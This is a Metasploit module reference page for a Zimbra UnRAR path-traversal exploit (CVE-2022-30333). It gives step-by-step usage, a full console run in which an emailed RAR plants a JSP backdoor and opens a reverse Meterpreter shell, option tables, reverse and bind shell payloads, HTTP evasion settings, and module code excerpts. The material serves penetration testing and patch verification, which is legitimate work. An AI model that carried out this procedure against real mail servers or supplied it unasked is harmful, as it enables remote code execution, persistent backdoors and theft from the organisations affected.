UnRAR Path Traversal in Zimbra (CVE-2022-30333) - Metasploit


This page contains detailed information about how to use the exploit/linux/http/zimbra_unrar_cve_2022_30333 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: UnRAR Path Traversal in Zimbra (CVE-2022-30333)
Module: exploit/linux/http/zimbra_unrar_cve_2022_30333
Source code: modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
Disclosure date: 2022-06-28
Last modification time: 2022-08-17 10:19:36 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-30333

This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on the following versions of Zimbra, provided UnRAR version 6.11 or earlier is installed: * Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use exploit/linux/http/zimbra_unrar_cve_2022_30333
msf exploit(zimbra_unrar_cve_2022_30333) > show targets
    ... a list of targets ...
msf exploit(zimbra_unrar_cve_2022_30333) > set TARGET target-id
msf exploit(zimbra_unrar_cve_2022_30333) > show options
    ... show and set options ...
msf exploit(zimbra_unrar_cve_2022_30333) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

  • TARGET_PATH: The location the payload should extract to (can, and should, contain path traversal characters - "../../").

Knowledge Base


Vulnerable Application


This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier) on Zimbra. You can get the vulnerable version of unrar here:

Zimbra is the specific target, because certain Zimbra versions use unrar to scan incoming email. Specifically, the following versions of Zimbra, assuming the vulnerable version of unrar is installed, are affected:

  • Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
  • Zimbra Collaboration 8.8.15 Patch 31 (and earlier)

Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra from the current version:

# apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18
# reboot

And to verify:

$ sudo -u zimbra /opt/zimbra/bin/zmcontrol -v
Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1.

Followed by specifically installing the vulnerable version of unrar linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work.

Verification Steps


To exploit Zimbra, first load the module and generate the .rar file:

msf6 > use exploit/linux/http/zimbra_unrar_cve_2022_30333
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
RHOSTS => 10.0.0.154
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/lnijw.jsp...
[*] Trying to trigger the backdoor @ public/lnijw.jsp...
[...] waiting [...]

Then, email that file to any user (including a non-existent mailbox) on the Zimbra server. Once the payload arrives at Zimbra, Zimbra should try to extract it to check for malware with no user interaction. Metasploit should see the malicious file extracted and get a session:

[...]
[*] Trying to trigger the backdoor @ public/lnijw.jsp...
[*] Trying to trigger the backdoor @ public/lnijw.jsp...
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:39710) at 2022-07-27 13:18:03 -0700

meterpreter > getuid
Server username: zimbra

Options


FILENAME

The filename to generate - defaults to payload.rar, but can be changed on the filesystem or whatever.

TARGET_PATH

The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.

TARGET_FILENAME

The actual filename. It really should end with .jsp, otherwise it won't execute.

By default, it's a random string with .jsp on the end. That should work fine, especially because we can't overwrite files and don't want to use the same payload name more than once.

TRIGGER_PAYLOAD

A boolean, default true, that determines whether we use HTTP requests to trigger the .jsp payload. Set to false to trigger the payload manually.

ListenerTimeout

The number of seconds to wait for a new session (default = 0, or infinite).

CheckInterval

The frequency with which to check for the payload on the server. Every CheckInterval, it performs an HTTP request to the payload path.

Go back to menu.

Msfconsole Usage


Here is how the linux/http/zimbra_unrar_cve_2022_30333 exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/zimbra_unrar_cve_2022_30333

[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > show info

       Name: UnRAR Path Traversal in Zimbra (CVE-2022-30333)
     Module: exploit/linux/http/zimbra_unrar_cve_2022_30333
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-06-28

Provided by:
  Simon Scannell
  Ron Bowes

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Zimbra Collaboration Suite

Check supported:
  No

Basic options:
  Name             Current Setting                           Required  Description
  ----             ---------------                           --------  -----------
  FILENAME         payload.rar                               no        The file name.
  Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                                       i/Using-Metasploit
  RPORT            443                                       yes       The target port (TCP)
  SSL              true                                      no        Negotiate SSL/TLS for outgoing connections
  TARGET_FILENAME                                            no        The filename to write in the target directory; should have a .jsp extensio
                                                                       n (default: <random>.jsp).
  TARGET_PATH      ../../../../../../../../../../../../opt/  yes       The location the payload should extract to (can, and should, contain path
                   zimbra/jetty_base/webapps/zimbra/public/            traversal characters - "../../").
  VHOST                                                      no        HTTP server virtual host

Payload information:

Description:
  This module creates a RAR file that can be emailed to a Zimbra 
  server to exploit CVE-2022-30333. If successful, it plants a 
  JSP-based backdoor in the public web directory, then executes that 
  backdoor. The core vulnerability is a path-traversal issue in unRAR 
  that can extract an arbitrary file to an arbitrary location on a 
  Linux system. This issue is exploitable on the following versions of 
  Zimbra, provided UnRAR version 6.11 or earlier is installed: * 
  Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra 
  Collaboration 8.8.15 Patch 31 (and earlier)

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-30333
  https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/
  https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946
  https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25
  https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32
  https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis

Module Options


This is a complete list of options available in the linux/http/zimbra_unrar_cve_2022_30333 exploit:

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > show options

Module options (exploit/linux/http/zimbra_unrar_cve_2022_30333):

   Name             Current Setting                           Required  Description
   ----             ---------------                           --------  -----------
   FILENAME         payload.rar                               no        The file name.
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                                                        ki/Using-Metasploit
   RPORT            443                                       yes       The target port (TCP)
   SSL              true                                      no        Negotiate SSL/TLS for outgoing connections
   TARGET_FILENAME                                            no        The filename to write in the target directory; should have a .jsp extensi
                                                                        on (default: <random>.jsp).
   TARGET_PATH      ../../../../../../../../../../../../opt/  yes       The location the payload should extract to (can, and should, contain path
                    zimbra/jetty_base/webapps/zimbra/public/             traversal characters - "../../").
   VHOST                                                      no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Zimbra Collaboration Suite

Advanced Options


Here is a complete list of advanced options supported by the linux/http/zimbra_unrar_cve_2022_30333 exploit:

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > show advanced

Module advanced options (exploit/linux/http/zimbra_unrar_cve_2022_30333):

   Name                     Current Setting                        Required  Description
   ----                     ---------------                        --------  -----------
   AllowNoCleanup           false                                  no        Allow exploitation without the possibility of cleaning up files
   CheckInterval            5                                      yes       The number of seconds to wait between each attempt to trigger the pa
                                                                             yload on the server.
   ContextInformationFile                                          no        The information file that contains context information
   DOMAIN                   WORKSTATION                            yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                   no        Conform to IIS, should work for most servers. Only set to false for
                                                                             non-IIS servers
   DisablePayloadHandler    false                                  no        Disable the handler code for the selected payload
   EXE::Custom                                                     no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR               false                                  no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack            false                                  no        Use the default template in case the specified one is missing
   EXE::Inject              false                                  no        Set to preserve the original EXE function
   EXE::OldMethod           false                                  no        Set to use the substitution EXE generation method.
   EXE::Path                                                       no        The directory in which to look for the executable template
   EXE::Template                                                   no        The executable template file name.
   EnableContextEncoding    false                                  no        Use transient context when encoding payloads
   FileDropperDelay                                                no        Delay in seconds before attempting cleanup
   FingerprintCheck         true                                   no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                               no        HTTP connection and receive timeout
   HttpPassword                                                    no        The HTTP password to specify for authentication
   HttpRawHeaders                                                  no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                  no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                  no        Show HTTP headers only in HttpTrace
   HttpUsername                                                    no        The HTTP username to specify for authentication
   ListenerTimeout          0                                      no        The maximum number of seconds to wait for new sessions.
   MSI::Custom                                                     no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR               false                                  no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                       no        The directory in which to look for the msi template
   MSI::Template                                                   no        The msi template file name
   MSI::UAC                 false                                  no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLServerNameIndication                                         no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                   yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
                                                                             uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
                                                                             .2)
   SYMLINK_FILENAME                                                no        The name of the symlink file to use (must be 12 characters or less;
                                                                             default: random)
   TRIGGER_PAYLOAD          true                                   no        If set, attempt to trigger the payload via an HTTP request.
   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac OS   no        The User-Agent header to use for all requests
                            X 12.2; rv:97.0) Gecko/20100101 Firef
                            ox/97.0
   VERBOSE                  false                                  no        Enable detailed status messages
   WORKSPACE                                                       no        Specify the workspace for this module

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-
                                                           framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
   MeterpreterTryToFork         false            no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy
                                                           but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/zimbra_unrar_cve_2022_30333 module can exploit:

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Zimbra Collaboration Suite

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/zimbra_unrar_cve_2022_30333 exploit:

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/ssh/interact                                       normal  No     Interact with Established SSH Connection
   5   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   6   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   7   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   8   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   9   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   10  payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   11  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   12  payload/linux/x64/pingback_bind_tcp                                normal  No     Linux x64 Pingback, Bind TCP Inline
   13  payload/linux/x64/pingback_reverse_tcp                             normal  No     Linux x64 Pingback, Reverse TCP Inline
   14  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   15  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   16  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   17  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   18  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   19  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   20  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   21  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   22  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   23  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   26  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   27  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   28  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   29  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   31  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   32  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   33  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   34  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   35  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   36  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   37  payload/linux/x86/read_file                                        normal  No     Linux Read File
   38  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   41  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   42  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   43  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   44  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   46  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   47  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   48  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   49  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   50  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   51  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/zimbra_unrar_cve_2022_30333 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apac
                                                            he)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apa
                                                            che)
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
                                                            u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

TARGET_FILENAME does not end with .jsp, was that intentional?


Here is a relevant code snippet related to the "TARGET_FILENAME does not end with .jsp, was that intentional?" error message:

92:	  end
93:	
94:	  # Generate an on-system filename using datastore options
95:	  def generate_target_filename
96:	    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
97:	      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
98:	    end
99:	
100:	    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
101:	  end
102:	

Failed to encode RAR file: <E>


Here is a relevant code snippet related to the "Failed to encode RAR file: <E>" error message:

126:	    print_status("Target filename: #{target_filename}")
127:	
128:	    begin
129:	      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)
130:	    rescue StandardError => e
131:	      fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")
132:	    end
133:	
134:	    file_create(rar)
135:	
136:	    print_good('File created! Email the file above to any user on the target Zimbra server')

Could not determine the public web path, disabling payload triggering


Here is a relevant code snippet related to the "Could not determine the public web path, disabling payload triggering" error message:

140:	
141:	    # Get the public path for triggering the vulnerability, terminate if we
142:	    # can't figure it out
143:	    public_filename = zimbra_get_public_path(target_filename)
144:	    if public_filename.nil?
145:	      print_warning('Could not determine the public web path, disabling payload triggering')
146:	      return
147:	    end
148:	
149:	    register_file_for_cleanup(target_filename)
150:	

Could not connect to the server to trigger the payload


Here is a relevant code snippet related to the "Could not connect to the server to trigger the payload" error message:

162:	        'method' => 'GET',
163:	        'uri' => normalize_uri(public_filename)
164:	      )
165:	
166:	      unless res
167:	        fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
168:	      end
169:	
170:	      # Break when the file successfully appears
171:	      if res.code == 200
172:	        print_good('Successfully triggered the payload')

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Simon Scannell
  • Ron Bowes

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.